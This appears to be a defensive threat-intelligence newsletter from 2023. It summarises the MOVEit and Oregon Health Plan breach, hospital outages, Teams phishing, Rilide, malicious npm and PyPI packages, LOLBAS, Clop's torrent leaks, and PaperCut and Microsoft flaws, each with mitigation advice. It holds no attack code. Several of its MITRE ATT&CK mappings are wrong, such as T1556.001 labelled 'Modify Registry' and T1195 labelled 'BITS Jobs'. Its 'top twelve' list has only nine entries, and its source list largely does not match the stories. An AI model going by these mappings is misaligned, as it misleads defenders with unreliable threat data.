Cyberattack Disrupts Hospital Computer Systems Across US, Oregon Health Data Breach Impacts Millions, and Top 2022 Vulnerabilities Revealed

At a Glance

Ransomware, Malware & Phishing

1. Data breach affects 1.7 million Oregon Health Plan members
2. Cyberattack disrupts hospital computer systems across US, hindering services
3. Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats
4. New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3
5. Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners
6. Malicious npm Packages Found Exfiltrating Sensitive Data from Developers
7. LOLBAS in the Wild: 11 Living-Off-The-Land Binaries That Could Be Used for Malicious Purposes
8. Clop ransomware now uses torrents to leak data and evade takedowns
9. Fake VMware vConnector package on PyPI targets IT pros

Vulnerabilities

1. Microsoft fixes flaw after being called irresponsible by Tenable CEO
2. New PaperCut Vulnerability Allows Remote Code Execution
3. FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022

Ransomware, Malware & Phishing

Data breach affects 1.7 million Oregon Health Plan members

Analysis: In a recent security incident, the MOVEit file transfer software suffered a breach that reverberated across the Oregon Department of Motor Vehicles (DMV) and the Oregon Health Plan (OHP) provider in June. This breach had far-reaching consequences, affecting a staggering 1.7 million members. The breach's origin lies in the exploitation of a well-known security vulnerability within the MOVEit software. The breach was brought to light by PH Tech, a healthcare provider contracting company, which promptly advised all OHP members to closely monitor their credit activities. Those impacted by the breach will soon receive notifications from PH Tech through mail, offering complimentary credit monitoring services.

Access Point recommends the following:

1. Swift Application of Security Patches: Access Point strongly recommends organizations utilizing MOVEit Transfer to promptly apply the security patches provided by Progress Software. The immediate implementation of these patches is of utmost importance to effectively neutralize the vulnerability.
2. Time-Sensitive Updates: Recognizing the critical role of time-sensitive updates, organizations must understand that such updates are pivotal in managing acknowledged security vulnerabilities and proactively preventing potential security breaches.
3. Deactivation of HTTP/HTTPS Traffic: As an additional layer of defense, organizations are advised to deactivate all HTTP/HTTPS traffic to environments that might be susceptible to compromise. This proactive measure acts as a deterrent against unauthorized access, serving as a barrier for malicious actors attempting to exploit the vulnerability.
4. Vigilance and Threat Detection: Maintaining continuous vigilance over the infrastructure is paramount. By doing so, organizations can efficiently detect and thwart potential threats. Implementing robust threat detection and monitoring systems is essential for promptly identifying any suspicious activities and preempting potential exploitation attempts.
5. Industry Best Practices Adoption: To fortify cybersecurity defenses, organizations are strongly urged to adopt industry best practices. Key aspects include the implementation of multi-factor authentication, conducting regular security audits, and providing comprehensive training to employees for recognizing and effectively responding to potential threats.

By diligently adhering to these recommendations, organizations can significantly enhance their overall cybersecurity posture, reducing their vulnerability to security breaches and minimizing the potential far-reaching consequences of such incidents.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1486 - Data Encrypted for Impact
• T1140 - Deobfuscate/Decode Files or Information
• T1083 - File and Directory Discovery
• T1562.001 - Impair Defenses: Disable or Modify Tools
• T1490 - Inhibit System Recovery  
• T1112 - Modify Registry
• T1106 - Native API
• T1135 - Network Share Discovery
• T1027.002 - Obfuscated Files or Information: Software Packing
• T1057 - Process Discovery
• T1489 - Service Stop
• T1518.001 - Software Discovery: Security Software Discovery
• T1553.002 - Subvert Trust Controls: Code Signing
• T1218.007 - System Binary Proxy Execution: Msiexec
• T1614.001 - System Location Discovery: System Language Discovery
• T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion

Cyberattack disrupts hospital computer systems across US, hindering services

Analysis: A recent wave of cyberattacks has targeted hospital computer systems across the United States, resulting in a cascade of disruptions. Emergency rooms in various states were forced to close, and ambulance diversions became necessary. The impact extended beyond immediate patient care, disrupting primary care services, elective surgeries, outpatient appointments, and even blood drives. The source of this incident is healthcare facilities operated by Prospect Medical Holdings, a California-based company with a presence in multiple states. In response, Prospect took a proactive approach, temporarily shutting down its systems, engaging third-party cybersecurity experts for an investigation, and placing patient needs at the forefront while striving to restore normal operations.

Access Point Recommends the following:

1. Regular Security Audits: Healthcare organizations should conduct routine security audits to identify vulnerabilities in their systems. This practice assists in fine-tuning cybersecurity measures and staying ahead of potential threats.
2. Cybersecurity Training: Employees should undergo comprehensive cybersecurity training to enhance their ability to identify phishing attempts, suspicious links, and other potential threats. This education empowers staff to play an active role in safeguarding digital assets.
3. Network Segmentation: Implement network segmentation to create isolated environments for critical healthcare systems. This approach limits the potential impact of cyberattacks, preventing unauthorized access to sensitive data.
4. Multi-Factor Authentication: Enforce the use of multi-factor authentication for accessing sensitive systems and data. This additional layer of security adds complexity to unauthorized access attempts.
5. Data Backups: Maintain frequent and encrypted backups of essential patient data and hospital operations. This precaution ensures data recovery and continuity in the event of a cyber incident.
6. Regular Updates: Keep software and systems up to date with the latest security patches. Regular updates are crucial in addressing known vulnerabilities and fortifying defenses.
7. Incident Response Plan: Develop a comprehensive incident response plan outlining clear steps to take during a cyberattack. This plan should encompass communication protocols, strategies for containment, and recovery procedures with minimal disruption to business operations.

Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats

Analysis: Microsoft recently exposed a series of targeted social engineering attacks orchestrated by a Russian nation-state threat actor known as Midnight Blizzard, also identified as APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. These attacks employed cunning tactics, leveraging the Microsoft Teams platform to deploy phishing lures with the intent of stealing user credentials. The threat actor exploited previously compromised Microsoft 365 tenants to establish new domains, masquerading as technical support entities. Operating through Teams messages, the attacker manipulated users into approving multi-factor authentication (MFA) prompts, thereby attempting to pilfer their credentials. This campaign, active since at least late May 2023, impacted a limited number of organizations, fewer than 40 globally and spanning various sectors.

Access Point recommends the following:

1. Employee Education: Organizations should prioritize educating their employees about the perils of social engineering attacks, particularly those delivered via platforms like Microsoft Teams. Employees need to exercise caution when engaging with unsolicited messages and remain vigilant regarding techniques employed by threat actors to extract sensitive information.
2. Multi-Factor Authentication Vigilance: Proper configuration and monitoring of multi-factor authentication mechanisms are essential. Thorough scrutiny of user approvals for MFA prompts can effectively deter unauthorized access attempts.
3. Security Assessments and Penetration Testing: Conducting regular security assessments and penetration testing can uncover vulnerabilities, including token theft techniques, authentication spear-phishing, password spray, and brute-force attacks. Identifying and addressing these vulnerabilities is crucial to safeguarding against potential breaches.
4. Comprehensive Monitoring: Organizations should maintain vigilant monitoring across both cloud and on-premises environments to detect any suspicious activities and thwart lateral movement by threat actors.
5. Robust Threat Detection and Response: Having robust threat detection and response capabilities in place is critical. These capabilities ensure timely identification of unauthorized access attempts, enabling swift and effective countermeasures.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1552 - Use Alternate Authentication Material: Token-Based Systems (Token Theft)
• T1566 - Phishing
• T1110 - Brute Force
• T1105 - Ingress Tool Transfer
• T1190 - Exploit Public-Facing Application  
• T1071 - Application Layer Protocol
• T1078 - Valid Accounts
• T1550 - Use Alternate Authentication Material: Web Session Cookie

New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3

Analysis: Security researchers have recently uncovered a newly emerged strain of malware named Rilide, specifically designed to target Chromium-based web browsers. This malicious software exhibits a remarkably high level of sophistication, featuring a modular design, intricate code obfuscation techniques, and adaptation to the Chrome Extension Manifest V3. Rilide's capabilities encompass data theft and cryptocurrency heists, making it a potent threat.

Notably, the malware has the ability to exfiltrate stolen information to a Telegram channel and capture screenshots at specified intervals. First documented in April 2023, Rilide leverages the Ekipa Remote Access Trojan (RAT) and the Aurora Stealer to deploy rogue browser extensions, paving the way for data and cryptocurrency theft. The malware's vendor, known as "friezer," has offered Rilide for sale on dark web forums at a price of $5,000.

The malware's functionality extends to disabling other browser add-ons, collecting login credentials, extracting browsing history and cookies, and even injecting malicious scripts to facilitate unauthorized withdrawals from cryptocurrency exchanges.

Access Point recommends the following:

1. Regular Software Updates: Keeping web browsers and extensions up to date is crucial. Regular updates serve to patch known vulnerabilities and bolster defense mechanisms against malware like Rilide.
2. Cautious Downloads: Avoid downloading extensions or applications from unofficial or unverified sources. Stick to the official Chrome Web Store and verified app repositories to minimize exposure to potentially malicious software.
3. Vigilance with Links and Downloads: Exercise caution when interacting with links or downloading files from unfamiliar sources. This is particularly important when dealing with purported popular applications like Palo Alto Networks' GlobalProtect app. Prioritize source verification before proceeding with installations.
4. Multi-Factor Authentication (MFA): Enabling MFA whenever possible adds an extra layer of security to online accounts, shielding them from unauthorized access attempts.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1027 - Obfuscated Files or Information
• T1064 - Scripting
• T1197 - BITS Jobs
• T1105 - Ingress Tool Transfer
• T1117 - Regsvr32
• T1021 - Remote Services

Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners

Analysis: Threat actors have recently employed a technique known as versioning to circumvent Google Play Store's malware detection mechanisms, leading to increased risks for Android users. This method involves a two-step process, where developers initially release an app version that successfully passes Google's pre-publication checks. However, the app is later updated with a concealed malware component. These updates are distributed from servers controlled by the attackers, and dynamic code loading (DCL) is utilized to deliver malicious code onto users' devices. Consequently, the seemingly legitimate app transforms into a backdoor for cybercriminal activities. This technique, termed versioning, has been harnessed in campaigns aimed at harvesting user credentials, sensitive data, and financial information. Notable malware instances employing versioning include "iRecorder - Screen Recorder" and SharkBot, a financial trojan.

Access Point recommends the following:

1. Trustworthy Sources: Android users should exclusively download apps from reputable sources, such as the Google Play Store. This practice substantially minimizes the likelihood of installing malicious applications.
2. Google Play Protect: Enabling Google Play Protect offers an additional layer of security. This feature identifies potentially harmful apps (PHAs) and alerts users regarding their presence on the device.
3. Regular Updates: Ensuring that both the Android operating system and apps are up to date is critical. Regular updates guarantee the application of the latest security patches, reducing the potential for exploitation by threat actors.
4. Enterprise Precautions: In enterprise environments, it is advisable to adopt defense-in-depth principles. This might involve restricting application installation sources to trusted platforms like Google Play or managing corporate devices via a mobile device management (MDM) platform.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1027 - Obfuscated Files or Information
• T1105 - Ingress Tool Transfer
• T1203 - Exploitation for Client Execution
• T1102 - Web Service
• T1003 - OS Credential Dumping
• T1505 - Server Software Component
• T1570 - Lateral Tool Transfer
• T1556.001 - Modify Registry
• T1117 - Regsvr32
• T1195 - BITS Jobs

Malicious npm Packages Found Exfiltrating Sensitive Data from Developers

Analysis: In a concerning development, cybersecurity researchers have recently unearthed a fresh wave of malicious packages residing within the npm package registry. These packages are meticulously crafted to covertly exfiltrate sensitive developer information. Detected by software supply chain firm Phylum on July 31, 2023, these packages exhibited an escalating level of sophistication. Notably, they were subsequently removed from the registry, only to be re-uploaded under different, seemingly legitimate names. The malicious packages, attributed to the npm user "malikrukd4732," employ a JavaScript file ("index.js") to initiate exfiltration of crucial data to a remote server.

Of significant concern is the suspicion that these packages target the cryptocurrency sector. Their functionality involves harvesting operating system details and conducting searches for specific file extensions like .env, .svn, and .gitlab. The captured data, which could encompass sensitive credentials and valuable intellectual property, is then transmitted in the form of a ZIP archive file to a remote server.

Access Point recommends the following:

1. Thorough Package Review: Developers must exercise utmost caution and conduct comprehensive assessments of third-party packages before incorporating them into their applications. Prioritize trusted and well-reviewed packages from reputable sources.
2. Dependency Monitoring: Regular monitoring of dependencies is essential to identify any unusual behavior or updates that may introduce malicious code. Leveraging automated tools to detect anomalies in package versions and contents can be highly effective.
3. Secure Coding Practices: Adhering to secure coding practices is vital to minimize the possibility of introducing vulnerabilities or malicious code into software projects. Robust coding practices serve as a robust barrier against potential threats.
4. Access Restriction: To safeguard sensitive files and directories, particularly those containing valuable credentials and intellectual property, implement strict access controls. Restricting unauthorized access can thwart potential data breaches.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1071: Application Layer Protocol
• T1078: Valid Accounts
• T1003: OS Credential Dumping
• T1005: Data from Local System
• T1204: User Execution
• T1027: Obfuscated Files or Information
• T1570: Lateral Tool Transfer
• T1566.001: Phishing
• T1505: Server Software Component

LOLBAS in the Wild: 11 Living-Off-The-Land Binaries That Could Be Used for Malicious Purposes

Analysis: Cybersecurity experts have uncovered 11 living-off-the-land binaries-and-scripts (LOLBAS) that could potentially facilitate post-exploitation activities, posing a significant threat to system security. The LOLBAS approach involves leveraging existing system binaries and scripts for malicious purposes, making it challenging for security teams to distinguish between genuine and harmful activities, as these actions are executed by trusted system utilities.

Israeli cybersecurity firm Pentera's research has unveiled nine LOLBAS downloaders and three executors that could empower threat actors to download and execute more potent malware on compromised hosts. The identified LOLBAS include seemingly innocuous binaries such as MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. While this list pertains to Microsoft-related LOLBAS, attackers could potentially leverage other executables from software beyond the Microsoft ecosystem to achieve similar goals.

A comprehensive attack chain involves hackers using LOLBAS downloaders to acquire more advanced malware, which is then surreptitiously executed through LOLBAS executors, ensuring a legitimate appearance within the system's process tree.

In parallel to these discoveries, Vectra disclosed an attack vector revolving around Microsoft Entra ID's cross-tenant synchronization (CTS) feature. This vector enables lateral movement to other tenants in the event of a privileged identity's compromise within the cloud environment. Attackers can exploit existing CTS configurations to move laterally between interconnected tenants, while a rogue Cross Tenant Access configuration can sustain persistent access within a compromised tenant.

Access Point recommends the following:

1. Conduct Regular Audits and Assessments: Regular security audits and assessments can help identify and mitigate vulnerabilities and potential risks, including those associated with LOLBAS and other attack vectors.
2. Robust Monitoring and Detection: Implement robust monitoring and detection mechanisms to swiftly identify suspicious activities tied to known LOLBAS and other binaries or scripts utilized for post-exploitation activities.
3. User Training: Educate users to recognize and report potential security threats, including LOLBAS-related activities, enabling prompt response and mitigation.
4. Advanced Endpoint Security Solutions: Leverage advanced endpoint security solutions capable of detecting and thwarting malicious activities tied to LOLBAS and other living-off-the-land techniques.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1059: Command and Scripting Interpreter
• T1112: Modify Registry
• T1047: Windows Management Instrumentation
• T1197: BITS Jobs
• T1218: Signed Binary Proxy Execution
• T1059: Command and Scripting Interpreter
• T1218: Signed Binary Proxy Execution
• T1041: Exfiltration Over C2 Channel
• T1064: Scripting
• T1204: User Execution
• T1070: Indicator Removal on Host

Clop ransomware now uses torrents to leak data and evade takedowns

Analysis: The Clop ransomware gang has shifted its extortion tactics by utilizing torrents to distribute data stolen in MOVEit attacks. Starting on May 27th, the threat actors exploited a zero-day vulnerability in the MOVEit Transfer secure file transfer platform to pilfer data from nearly 600 organizations globally. On June 14th, Clop began extorting victims, listing names on their Tor data leak site, and subsequently releasing the purloined files to the public. However, the use of Tor sites was hampered by slow download speeds, limiting the impact of the data leak. To overcome this limitation, Clop has transitioned to employing torrents for data distribution.

Torrents have proven to be a more effective method for distributing stolen data. By creating torrents for twenty victims, including notable organizations such as Aon, K & L Gates, Putnam, Delaware Life, Zurich Brazil, and Heidelberg, the ransomware gang achieves faster data transfer through peer-to-peer sharing among users. Speed tests conducted by BleepingComputer indicate significantly improved performance compared to traditional Tor data leak sites, reaching 5.4 Mbps data transfer speeds.

This new distribution strategy is decentralized, rendering it difficult for law enforcement to halt. Even if the original seeder becomes inaccessible, other devices can assume the seeding role, ensuring uninterrupted data distribution. Clop's adoption of torrents could result in wider and faster dissemination of pilfered data, amplifying the pressure on victims to meet ransom demands. Projections suggest the ransomware gang could amass $75-$100 million in extortion payments, predominantly from a limited number of companies making substantial ransom payments.

Access Point recommends the following:

1. Regular Patching: Consistently update software and applications with the latest patches and security fixes to mitigate the risk of zero-day vulnerabilities.
2. Secure Backups: Maintain secure and up-to-date backups of critical data to minimize the impact of ransomware attacks and reduce reliance on ransom payments.
3. Network Segmentation: Implement network segmentation to curtail the lateral spread of ransomware within the network, limiting its impact.
4. Incident Response Planning: Develop and routinely test an incident response plan to effectively handle ransomware attacks and other cybersecurity incidents with minimal disruption to business operations.

Fake VMware vConnector package on PyPI targets IT pros

Analysis: A concerning incident has come to light involving the upload of a malicious package named 'VMConnect' onto the Python Package Index (PyPI). This package impersonated the widely-used 'vConnector' module for VMware vSphere connectors, a tool extensively utilized by developers and IT professionals. The package was introduced on July 28, 2023, and managed to be downloaded 237 times before its removal on August 1, 2023. Subsequent investigation by Sonatype exposed two more malicious packages, 'ethter' and 'quantiumbase,' both harboring identical code.

The 'ethter' package emulated the legitimate 'eth-tester,' while 'quantiumbase' replicated the 'databases' package. These malicious packages aimed to deceive users into believing they were employing legitimate tools, thereby potentially prolonging the period of infection. Notably, the 'VMConnect' package contained code within its 'init.py' file that exhibited signs of malicious intent. This code included a base64-encoded string that, when decoded, executed on a separate process. It periodically retrieved data from an attacker-controlled URL, executing it on the compromised machine. The URL cleverly masked itself as an image file but served plaintext code instead.

Efforts to retrieve the second-stage payload from the external source proved unsuccessful. Nonetheless, the covert communication with the obscure external URL highlighted high-risk behavior, even though the specific payload remained undisclosed. ReversingLabs also corroborated this campaign, publishing a report, though conclusive insights regarding the threat actor, second-stage payload, and ultimate objectives remained elusive.

The attackers displayed a level of sophistication by providing accurate and realistic package descriptions on PyPI. They even crafted matching GitHub repositories, compounding the challenge for developers in detecting malicious activities. While there were indications, such as limited history, low download counts, obscured code within files, and subtly altered package names, these red flags were not easily discernible.

Access Point recommends the following:

1. Source Verification: Before downloading and utilizing packages, ensure the authenticity of the source and check for any suspicious behavior or inconsistencies.
2. Investigate Package History: Scrutinize the history and download counts of packages, particularly if they are new or exhibit low download statistics.
3. Code Examination: Thoroughly review package code for any indications of malicious intent, such as hidden or obfuscated code.
4. Trusted Repositories: Rely on well-known and reputable repositories when acquiring packages to mitigate the risk of downloading malicious software.
5. Regular Updates: Maintain software up-to-date by performing regular updates and patching to thwart potential exploitation attempts.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1518 - Initial Access: Software Discovery  
• T1105 - Execution: Remote File Copy  
• T1027 - Defense Evasion: Obfuscated Files or Information  
• T1105 - Command and Control: Remote File Copy  

Vulnerabilities

Microsoft fixes flaw after being called irresponsible by Tenable CEO

Analysis: Microsoft recently addressed a significant vulnerability within its Power Platform Custom Connectors feature. The flaw stemmed from inadequate access controls for Azure Function hosts associated with these connectors. While these connectors are designed to interact through authenticated APIs, a lapse allowed unauthorized requests to bypass authentication. This created an opportunity for malicious actors to potentially exploit unprotected Azure Function hosts, gaining access to sensitive data such as OAuth client IDs.

Tenable, a cybersecurity company, brought this vulnerability to light, emphasizing its severity after discovering bank authentication secrets at risk. Following their discovery, Tenable promptly communicated the issue to Microsoft. Initially, Microsoft believed only Tenable's researchers had exploited the vulnerability, but further analysis revealed inadequately secured Azure Functions beyond their attempts.

Microsoft's initial attempt to address the issue on June 7th was deemed insufficient by Tenable. However, by August 2nd, Microsoft declared the vulnerability fully resolved and informed affected clients via the Microsoft 365 Admin Center by August 4th. Despite this, Tenable indicated that the fix primarily targeted recently launched Power Apps and Power Automation custom connectors, potentially leaving clients with earlier setups seeking clarity on the remediation measures.

Tenable's CEO, Amit Yoran, criticized Microsoft's initial response as "grossly irresponsible." The industry norm is to rectify such vulnerabilities within 90 days, and Microsoft's proposed timeline for resolution appeared extended. This delay, combined with concerns about Microsoft's swift action on security vulnerabilities, raised further apprehensions. Yoran underscored the lingering risk for organizations that had utilized the service prior to the eventual fix, emphasizing the urgency of risk mitigation.

Access Point recommends the following:

1. Security Review: Organizations should promptly review the security of their Azure Function hosts to ensure they are not vulnerable.
2. Coordination with Microsoft: Directly engage with Microsoft to gain a comprehensive understanding of the remediation efforts undertaken, ensuring that legacy setups are not at risk.
3. Consistent Audits: Regularly audit system integrations and external connectors to identify and address potential security gaps.
4. Stay Informed: Remain informed about industry vulnerabilities and patches to quickly address emerging security concerns.

New PaperCut Vulnerability Allows Remote Code Execution

Analysis: Organizations utilizing PaperCut NG/MF print management software are facing a new and significant security concern, as a high-severity vulnerability (CVE-2023-39143) has been identified. This flaw can potentially allow unauthenticated attackers to read or write arbitrary files, posing a grave risk of remote code execution, especially in specific configurations. Notably, the vulnerability is most pronounced on PaperCut servers operating on Windows systems, particularly if the external device integration setting is enabled—a default configuration in installations like the PaperCut NG Commercial version and PaperCut MF. The security firm Horizon3, responsible for the discovery, has indicated that a substantial number of PaperCut installations could be susceptible to this vulnerability.

As a precautionary measure, Horizon3 has chosen to withhold specific technical details of the vulnerability to deter malicious exploitation. However, they have provided organizations with a command to assess the vulnerability status of their PaperCut servers. In response, PaperCut has swiftly introduced a patch in version 22.1.3, which addresses this specific vulnerability and other potential threats. They have also included recommended mitigation measures.

While there is no evidence of the CVE-2023-39143 vulnerability being actively exploited, it's noteworthy that another recent vulnerability in PaperCut, CVE-2023-27350, has gained attention from ransomware syndicates and state-sponsored threat actors. Both these vulnerabilities can be exploited without requiring user interaction or authentication. Exploiting CVE-2023-39143 is considered more intricate, demanding the exploitation of several bugs in tandem. PaperCut has classified this flaw as two path traversal bugs and emphasized that attackers would need direct server IP access for effective exploitation.

Access Point recommends the following:

1. Apply Patches: Update systems to PaperCut version 22.1.3 promptly to address the identified vulnerabilities.
2. Check Configuration: Verify if external device integration setting is activated on PaperCut servers and follow Horizon3's guidance to assess vulnerability susceptibility.
3. Security Audits: Consider conducting regular security audits to ensure ongoing system integrity.
4. Continuous Monitoring: Keep a vigilant watch for any unusual activities, particularly if your systems possess direct server IP access that could potentially be exploited.

FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022

Analysis: Numerous prominent cybersecurity authorities, including CISA, NSA, and the FBI, have collaborated with the Five Eyes alliance to release a list of the twelve most exploited vulnerabilities in 2022. Threat actors have increasingly targeted outdated software vulnerabilities, focusing on attacking unpatched systems exposed on the internet, rather than immediately exploiting recently disclosed vulnerabilities. The availability of proof-of-concept code in the public domain has facilitated these malicious cyber activities.

The list of the top twelve exploited vulnerabilities in 2022, as reported by the CISA Advisory, includes:

1. CVE-2018-13379: Affecting Fortinet SSL VPNs, this vulnerability was frequently exploited in 2020 and 2021.
2. CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523: Under the umbrella "ProxyShell," these vulnerabilities impact Microsoft Exchange email servers. They target the Microsoft Client Access Service (CAS) on port 443, commonly exposed to the internet for email access via mobile devices and web browsers.
3. CVE-2021-40539: This vulnerability is a remote code execution (RCE) flaw affecting Zoho ManageEngine ADSelfService Plus, associated with an outdated third-party dependency. CISA has reported active exploitation by Advanced Persistent Threats.
4. CVE-2021-26084: Affecting Atlassian Confluence Server and Data Center, this vulnerability enables unauthenticated attackers to execute arbitrary code. It gained notoriety after the release of proof-of-concept code.
5. CVE-2021-44228: Known as Log4Shell, this affects Apache's Log4j library. Exploitation involves submitting a crafted request that executes arbitrary code, granting the attacker full system control.
6. CVE-2022-22954 and CVE-2022-22960: These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE access, Identity Manager, and other VMware products.
7. CVE-2022-1388: Affecting f5 BIG-IP application delivery and security software, this vulnerability permits unauthenticated attackers to bypass iControl REST authentication.
8. CVE-2022-30190: This vulnerability affects the Microsoft Support Diagnostic Tool, enabling a remote, unauthenticated attacker to take control of the system.
9. CVE-2022-26134: Initially a zero-day, this vulnerability affects Atlassian Confluence and Data Center, leading to Object-Graph Navigation Language (OGNL) Injection. It allows unauthenticated attackers to execute arbitrary code on the vulnerable device.

Access Point recommends taking immediate action to address these vulnerabilities if they apply to your environment. The presence of unpatched vulnerabilities significantly elevates the risk of cyberattacks. It's crucial to ensure a proper patching cadence and promptly monitor and address actively exploited vulnerabilities to minimize potential threats and protect your organization's security.

Sources

https://thehackernews.com/2023/07/the-alarming-rise-of-infostealers-how.html

https://thehackernews.com/2023/07/decoy-dog-new-breed-of-malware-posing.html

https://thehackernews.com/2023/07/hackers-abusing-windows-search-feature.html

https://thehackernews.com/2023/07/icedid-malware-adapts-and-expands.html

https://thehackernews.com/2023/07/fruity-trojan-uses-deceptive-software.html

https://thehackernews.com/2023/07/avrecon-botnet-leveraging-compromised.html

https://www.bleepingcomputer.com/news/security/8-million-people-hit-by-data-breach-at-us-govt-contractor-maximus/

https://www.bleepingcomputer.com/news/security/breachforums-database-and-private-chats-for-sale-in-hacker-data-breach/

https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/

https://www.bleepingcomputer.com/news/security/cisa-issues-new-warning-on-actively-exploited-ivanti-mobileiron-bugs/

https://thehackernews.com/2023/07/multiple-flaws-found-in-ninja-forms.html

https://www.securityweek.com/zimbra-patches-exploited-zero-day-vulnerability/